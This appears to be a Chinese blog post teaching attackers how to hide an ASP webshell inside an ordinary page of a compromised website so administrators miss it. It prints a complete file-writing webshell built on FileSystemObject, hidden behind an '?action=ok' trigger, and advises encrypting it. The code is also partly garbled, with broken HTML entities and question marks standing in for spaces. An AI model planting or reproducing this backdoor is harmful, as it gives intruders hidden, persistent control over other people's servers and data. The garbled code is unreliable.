得到网站的webshell后,如果被管理员发现,那么你的马就没用了?,被删了!?管理员都也不都是混饭吃的,所以我们要隐藏好我们的 WEBSHELL,?下面是关于ASP插入型?木马?几种利用方法?不容易被发现~~~呵呵?我拿个webshell给大家做演示:?好,我们随便找一个 要做手脚的ASP文件?1.在我们要做手脚的ASP文件里加入如下内容?<%?if?request(action)=ok?then?%& gt;?##################################?<%?end?if?%>?在######################### 处加入你的shell代码?代码我已经提供了?如newmm.asp?木马?(建议加密代码):大家很熟悉吧,我以前的教程做过分析 了?<%?if?request(action)=ok?then?%>?<%dim?objFSO%>?& lt;%dim?fdata%>?<%dim?objCountFile%>?<%on?error?resume?next%>?<%Set?objFSO?=?Server.CreateObject(Scripting.FileSystemObject)%& gt;?<%if?Trim(request(syfdpath))<>?then%>?<%fdata?=?request(cyfddata)%& gt;?<%Set?objCountFile=objFSO.CreateTextFile(request(syfdpath),True)%& gt;?<%objCountFile.Write?fdata%>?<%if?err?=0?then%>?& lt;%response.write?save?Success!%& gt;?<%else%>?<%response.write? Save?UnSuccess!%>?<%end?if%>?<%err.clear%>?<%end?if%>?<%objCountFile.Close%>?<%Set?objCountFile=Nothing%& gt;?<%Set?objFSO?=?Nothing%>?<%Response.write?< form?action=?method=post>%>?<%Response.write?保存文件的< font?color=red>绝对路径(包括文件名:如D:\web\x.asp):%>?& lt;%Response.Write??<%Response.Write?
%>?<%Response.write?本文件绝对路 径%>?<%=server.mappath(Request.ServerVariables(SCRIPT_NAME))%>?& lt;%Response.write?
%>?<%Response.write?输入的内 容:%>?<%Response.write?%>?<%Response.write?%>?<%Response.write?

%>?<%?end?if%>?加入以 后不影响正常浏揽?访问的时候在你做了手脚的ASP文件后面加上?action=ok(例如:index.asp?action=ok)?就可以调出 shell了,不影响正常浏揽?大家看到了吧,呵呵

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!